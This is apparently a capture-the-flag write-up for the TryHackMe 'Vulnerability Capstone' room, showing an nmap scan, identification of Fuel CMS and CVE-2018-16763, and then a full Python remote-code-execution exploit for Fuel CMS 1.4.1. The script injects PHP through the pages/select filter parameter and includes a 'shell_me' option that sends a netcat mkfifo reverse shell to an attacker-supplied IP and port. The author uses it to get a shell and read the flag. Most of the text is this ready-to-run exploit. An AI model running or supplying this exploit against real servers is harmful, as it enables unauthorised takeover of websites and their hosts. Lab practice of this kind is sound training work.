Vulnerability Capstone
Question 1
- What is the name of the application running on the vulnerable machine? after running a scan on the IP Address i found open ports
┌──(kali㉿kali)-[~]
└─$ nmap -sV 10.10.42.79 -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-02 09:16 EST
Nmap scan report for 10.10.42.79
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.17 seconds
there is a web-server running on port 80 so i navigate to the site and found:
Question 2
- What is the version number of this application? from the last screenshot we will find the answer
Question 3
- What is the number of the CVE that allows an attacker to remotely execute code on this application? Format: CVE-XXXX-XXXXX
searching for exploit for the service and version running i got the above result and also know that i can get RCE from the server.
if we click on the first search result we will find the CVE number
i downloaded the exploit but it didn’t work so i decide to use the exploit from tryhackme attackbox
Attackbox exploit
#!/usr/bin/python3
# Exploit Title: fuelCMS 1.4.1 - Remote Code Execution
# Date: 2019-07-19
# Exploit Author: 0xd0ff9
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763
#
# Poc Created by Ac1d (assassin)
import requests
import sys
import urllib
from requests.sessions import extract_cookies_to_jar
class col:
HEADER = '\033[95m'
BLUE = '\033[94m'
CYAN = '\033[96m'
GREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
RESET = '\033[0m'
BLACK = "\033[0;30m"
RED = "\033[0;31m"
GREEN = "\033[0;32m"
BROWN = "\033[0;33m"
BLUE = "\033[0;34m"
PURPLE = "\033[0;35m"
LIGHT_GRAY = "\033[0;37m"
DARK_GRAY = "\033[1;30m"
LIGHT_RED = "\033[1;31m"
LIGHT_GREEN = "\033[1;32m"
YELLOW = "\033[1;33m"
LIGHT_BLUE = "\033[1;34m"
LIGHT_PURPLE = "\033[1;35m"
LIGHT_CYAN = "\033[1;36m"
LIGHT_WHITE = "\033[1;37m"
BOLD = "\033[1m"
FAINT = "\033[2m"
ITALIC = "\033[3m"
UNDERLINE = "\033[4m"
BLINK = "\033[5m"
NEGATIVE = "\033[7m"
CROSSED = "\033[9m"
def banner():
banner = r"""
______ _ _____ ___ ___ _____
| ___| | / __ \| \/ |/ ___|
| |_ _ _ ___| | / \/| . . |\ `--.
| _| | | |/ _ \ | | | |\/| | `--. \
| | | |_| | __/ | \__/\| | | |/\__/ /
\_| \__,_|\___|_|\____/\_| |_/\____/
Tested on 1.4
"""
banner += "Created by Ac1d"
return col.LIGHT_BLUE + banner + col.RESET
def help():
banner = col.LIGHT_WHITE + "\n\tMenu\n"
banner += col.LIGHT_GREEN
banner += "\nexit -\tExit app"
banner += "\nshell_me -\tGet a reverse shell (netcat) "
banner += "\nhelp -\tShow this help\n"+ col.RESET
return banner
print(banner())
print(help())
#http://10.10.12.27/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27ls%20-la%27)%2B%27
if len(sys.argv) != 2:
print("\nUsage: python3 exploit.py Vulnerable IPADDRESS")
sys.exit(0)
IP=sys.argv[1]
def parsePage(page):
try:
page = page.split("<h4>A PHP Error was encountered</h4>")[0]
page = page.split("<div")[0]
page = page[6:]
return page
except:
return False
try:
while True:
cmd = input(col.LIGHT_WHITE +"fuelCMS$ " + col.RESET)
if cmd[0:4].lower() == "exit":
print(col.RED + "Exiting..." + col.RESET)
sys.exit(0)
if cmd[0:8] == "shell_me":
IP2, PORT = input(col.LIGHT_BLUE + "Enter your attacking machine IP:PORT $ " + col.RESET).split(":")
nc = f"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {IP2} {PORT} >/tmp/f"
cmd = nc
print(col.LIGHT_GREEN + "\nHope you had your listener ready!!" + col.RESET)
if cmd[0:4] == "help":
print(help())
continue
if not "/tmp/f;mkfifo" in cmd:
print(col.LIGHT_GRAY + "Sending request." + col.RESET)
cmd = urllib.parse.quote(cmd)
r = requests.get(f"http://{IP}/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a(%27"+ cmd +"%27)%2B%27")
if r.status_code == 200:
page = parsePage(r.text)
if page == "\n":
print(col.RED + "No result" + col.RESET)
continue
print(col.LIGHT_GREEN+ f"\n{page.strip()}" + col.RESET)
except Exception as e:
print(col.RED + f"An error occured, please try again...\n\n{e}" + col.RESET)
running this exploit and selecting the shell_me option then i specify my listening IP:PORT and i got a reverse shell
navigating to /home/ubuntu i found the flag
